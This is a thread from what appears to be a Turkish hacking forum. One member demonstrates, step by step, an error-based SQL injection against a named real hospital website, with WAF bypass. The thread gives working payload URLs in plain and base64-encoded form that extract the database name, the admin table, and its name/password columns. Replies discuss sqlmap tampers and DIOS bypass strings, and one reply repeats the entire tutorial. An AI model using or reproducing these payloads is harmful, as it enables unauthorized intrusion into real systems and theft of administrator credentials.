Manuel Xpath İnjection(Base64)waff bypass denemesi #3

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
202
24
Debian
Selamun Aleyküm ....
bu konumuzda'da xpath injectiondan bahsedeceğim.. Örnek Sitemiz ;

Kod:
https://www.themissionhospital.com/news-d.php?id=Nw==
XotWX.png


şimdi url sonunda gördüğünüz gibi " news-d.php?id=Nw== " var,
ben hemen "==" görünce base64 olduğunu anlıyor ve decode ediyorum .
Nw== "7 " sayısını veriyor bize. yani url şu şekilde ;
Kod:
https://www.themissionhospital.com/news-d.php?id=7
Tamam şimdi ' koyalım ve base64 çevirelim.
Kod:
https://www.themissionhospital.com/news-d.php?id=Nyc=
XFsDT.png


Tamam sql hatamızı da aldık. çok uzatmadan "URL Balancer" denediğim de ekrana direk 7' -- -çıktısı verdi,
bunun üzerine dedim ki eee bu direk benim yazdığımı ekrana yazdırıyor çıktı olarak veriyor ise ya error based'dır, yada xpath dir.

xpath ile database çekmeye çalıştığımda mod_security ile karşılaştım.

Kod:
https://www.themissionhospital.com/news-d.php?id=7and extractvalue(0x0a,concat(0x0a,(select database())))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCBkYXRhYmFzZSgpKSkp
Xoq66.png


Waffı bypassladım,

Kod:
https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ database())))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyBkYXRhYmFzZSgpKSkp
Xo5bX.png


Tamam db adını öğrendik

Database adı : themissi_missiondb

sıra geldi tablolarımızı yazdırmaya,
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=[/B][B]7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ table_name /*!50000from*/  /*!50000information_schema*/.tables where table_schema=database() limit 0,1)))[/B]
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyB0YWJsZV9uYW1lIC8qITUwMDAwZnJvbSovCiAvKiE1MDAwMGluZm9ybWF0aW9uX3NjaGVtYSovLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpKSkK[/B]


XoEGb.png


şansımıza ilk tablo "mh_admin" sıra geldi kolonlarımızı çekmeye,
Kod:
[B][B]https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ column_name /*!50000from*/  /*!50000information_schema*/.columns where table_name=0x6d685f61646d696e limit 0,1)))
[/B][/B]
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyBjb2x1bW5fbmFtZSAvKiE1MDAwMGZyb20qLwogLyohNTAwMDBpbmZvcm1hdGlvbl9zY2hlbWEqLy5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9MHg2ZDY4NWY2MTY0NmQ2OTZlIGxpbWl0IDAsMSkpKQ==[/B]
Sırayla limit değerini arttırdığımız zaman(0arttırıyoruz) "name" ve "password" kolonunu ulaşmış olduk.
XoNiF.png


Son işlem sıra geldi dump etmeye,

Kod:
https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ /*!50000concat*/(name,0x3a3a,password) from mh_admin limit 0,1)))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyAvKiE1MDAwMGNvbmNhdCovCihuYW1lLDB4M2EzYSxwYXNzd29yZCkgZnJvbSBtaF9hZG1pbiBsaW1pdCAwLDEpKSk=
Xov83.png



Evet umarım faydalı bir konu olmuştur sizin içinde..

sağlıcakla kalın...
 
Son düzenleme:

TaoLao

Katılımcı Üye
4 Ara 2020
602
200
127.0.0.1
Cevap: Manuel Xpath İnjection(Base64) bypass denemesi #3

Arasak bulamayacağımız konulardan biri daha, emeğine sağlık hocam.
 

xmajestar

Katılımcı Üye
13 Ocak 2021
625
105
tzdata-TR
Cevap: Manuel Xpath İnjection(Base64) bypass denemesi #3

reis eline sağlık ama şu kod yazdığın yerlere birer satır koysan çok iyi olur böyle yazı seçilemio ve kopyalanmio


ve manuel yerine bunu yapan tool varmı sqlmap base64 database çekiomu ?
 
Son düzenleme:

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
202
24
Debian
Cevap: Manuel Xpath İnjection(Base64) bypass denemesi #3

reis eline sağlık ama şu kod yazdığın yerlere birer satır koysan çok iyi olur böyle yazı seçilemio ve kopyalanmio


ve manuel yerine bunu yapan tool varmı sqlmap base64 database çekiomu ?


sqlmap'ın base64 için tamperi bulunmakta, zaman kaybı olmaması adına manuel öneririm. manuel çekemediğim zaman sqlmap'a başvuruyorum.

kodlar için yapabileceğim bir şey yok malesef bende düzgün gösteriyor
 

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
202
24
Debian
Cevap: Manuel Xpath İnjection(Base64) bypass denemesi #3

Eline sağlık. Konu sabit.

Eline sağlık. Çok güzel açıklanmış bir konu

Elinize Sağlık Hocam

Arasak bulamayacağımız konulardan biri daha, emeğine sağlık hocam.

reis eline sağlık ama şu kod yazdığın yerlere birer satır koysan çok iyi olur böyle yazı seçilemio ve kopyalanmio


ve manuel yerine bunu yapan tool varmı sqlmap base64 database çekiomu ?


Yorumlarınız için çok teşekkür ederim, daha iyi konulara inşallah :)
 

ѕeleɴια

Kıdemli Üye
18 May 2018
2,620
905
ZYZZ
Elinize sağlık. Bu distoların waf'ı neye göre bypassladığı hakkında detaylı bilgi daha güzel olabilirdi.
 

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
202
24
Debian
Elinize Sağlık, güzel bir konu olmuş.


Teşekkür ederim.


ѕeleɴια;9355252' Alıntı:
Elinize sağlık. Bu distoların waf'ı neye göre bypassladığı hakkında detaylı bilgi daha güzel olabilirdi.



Teşekkür ederim,


Dios hazır bir kod parçasıdır yani manuel de yaptığımız tüm işlemleri barındırabiliyor. Zaman kaybı olmadan tek tek databaseleri , tabloları sonra kolonları çekip ugraşacağımıza bunların hepsini yapan kod parçasını bi kenarda tutmaktır dios. elimiz de 2 tane dios ve bir waffli site var sayalım,

1. Dios içerisindeki stringlerin tamamı /*!50000string/**_**/*/ ile bypasslı


2. Dios içerisindeki tüm stringler /*!50000string*/ bypasslı


Şimdi zaafiyetli kolonlarımızı yazdırdım 2 diosu da denedim. Ve 1. Diosun waffi geçebildiğini gördüm, 2. Dios ise waffa takıldı.


Yani neye göre bypasslar diye sormuşsun, dios otomotize bir şey değil internette veya kendimiz de yazabiliriz bu diosu, şuana kadar tecrübelerinden oluşturduğun ve en çok kullandığın waff bypassları toplarsın kendi diosunu yazarken tüm işlemler de kullanırsın mesela :)
 

ѕeleɴια

Kıdemli Üye
18 May 2018
2,620
905
ZYZZ

Teşekkür ederim.






Teşekkür ederim,


Dios hazır bir kod parçasıdır yani manuel de yaptığımız tüm işlemleri barındırabiliyor. Zaman kaybı olmadan tek tek databaseleri , tabloları sonra kolonları çekip ugraşacağımıza bunların hepsini yapan kod parçasını bi kenarda tutmaktır dios. elimiz de 2 tane dios ve bir waffli site var sayalım,

1. Dios içerisindeki stringlerin tamamı /*!50000string/**_**/*/ ile bypasslı


2. Dios içerisindeki tüm stringler /*!50000string*/ bypasslı


Şimdi zaafiyetli kolonlarımızı yazdırdım 2 diosu da denedim. Ve 1. Diosun waffi geçebildiğini gördüm, 2. Dios ise waffa takıldı.


Yani neye göre bypasslar diye sormuşsun, dios otomotize bir şey değil internette veya kendimiz de yazabiliriz bu diosu, şuana kadar tecrübelerinden oluşturduğun ve en çok kullandığın waff bypassları toplarsın kendi diosunu yazarken tüm işlemler de kullanırsın mesela :)

Harika. Teşekkür ederim, böyle tepki neden verdin derseniz. Genelde yazdığım yorumları yanlış anlar hemen atarlanırlar o yüzden. Elinize sağlık
 

Code 404

Üye
17 Kas 2023
51
26
/ProgramData
Selamun Aleyküm ....
bu konumuzda'da xpath injectiondan bahsedeceğim.. Örnek Sitemiz ;


Kod:
https://www.themissionhospital.com/news-d.php?id=Nw==
XotWX.png


şimdi url sonunda gördüğünüz gibi " news-d.php?id=Nw== " var,
ben hemen "==" görünce base64 olduğunu anlıyor ve decode ediyorum .
Nw== "7 " sayısını veriyor bize. yani url şu şekilde ;

Kod:
https://www.themissionhospital.com/news-d.php?id=7
Tamam şimdi ' koyalım ve base64 çevirelim.

Kod:
https://www.themissionhospital.com/news-d.php?id=Nyc=
XFsDT.png


Tamam sql hatamızı da aldık. çok uzatmadan "URL Balancer" denediğim de ekrana direk 7' -- -çıktısı verdi,
bunun üzerine dedim ki eee bu direk benim yazdığımı ekrana yazdırıyor çıktı olarak veriyor ise ya error based'dır, yada xpath dir.


xpath ile database çekmeye çalıştığımda mod_security ile karşılaştım.

Kod:
https://www.themissionhospital.com/news-d.php?id=7and extractvalue(0x0a,concat(0x0a,(select database())))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCBkYXRhYmFzZSgpKSkp
Xoq66.png


Waffı bypassladım,

Kod:
https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ database())))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyBkYXRhYmFzZSgpKSkp
Xo5bX.png


Tamam db adını öğrendik
Database adı : themissi_missiondb
sıra geldi tablolarımızı yazdırmaya,
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ table_name /*!50000from*/  /*!50000information_schema*/.tables where table_schema=database() limit 0,1)))[/B]
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyB0YWJsZV9uYW1lIC8qITUwMDAwZnJvbSovCiAvKiE1MDAwMGluZm9ybWF0aW9uX3NjaGVtYSovLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpKSkK[/B]

XoEGb.png


şansımıza ilk tablo "mh_admin" sıra geldi kolonlarımızı çekmeye,

Kod:
[B][B]https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ column_name /*!50000from*/  /*!50000information_schema*/.columns where table_name=0x6d685f61646d696e limit 0,1)))
[/B][/B]
Kod:
[B]https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyBjb2x1bW5fbmFtZSAvKiE1MDAwMGZyb20qLwogLyohNTAwMDBpbmZvcm1hdGlvbl9zY2hlbWEqLy5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9MHg2ZDY4NWY2MTY0NmQ2OTZlIGxpbWl0IDAsMSkpKQ==[/B]
Sırayla limit değerini arttırdığımız zaman(0arttırıyoruz) "name" ve "password" kolonunu ulaşmış olduk.
XoNiF.png


Son işlem sıra geldi dump etmeye,

Kod:
https://www.themissionhospital.com/news-d.php?id=7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ /*!50000concat*/(name,0x3a3a,password) from mh_admin limit 0,1)))
Kod:
https://www.themissionhospital.com/news-d.php?id=NyBhbmQgLyohNTAwMDBleHRyYWN0dmFsdWUqLygweDBhLC8qITUwMDAwY29uY2F0Ki8oMHgwYSwoLyohNTAwMDBzZWxlY3QqLyAvKiE1MDAwMGNvbmNhdCovCihuYW1lLDB4M2EzYSxwYXNzd29yZCkgZnJvbSBtaF9hZG1pbiBsaW1pdCAwLDEpKSk=
Xov83.png



Evet umarım faydalı bir konu olmuştur sizin içinde..

sağlıcakla kalın...

Ve Aleyküm Selam Faydalı Bir Konu Olmuş Eline Sağlık Dost.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.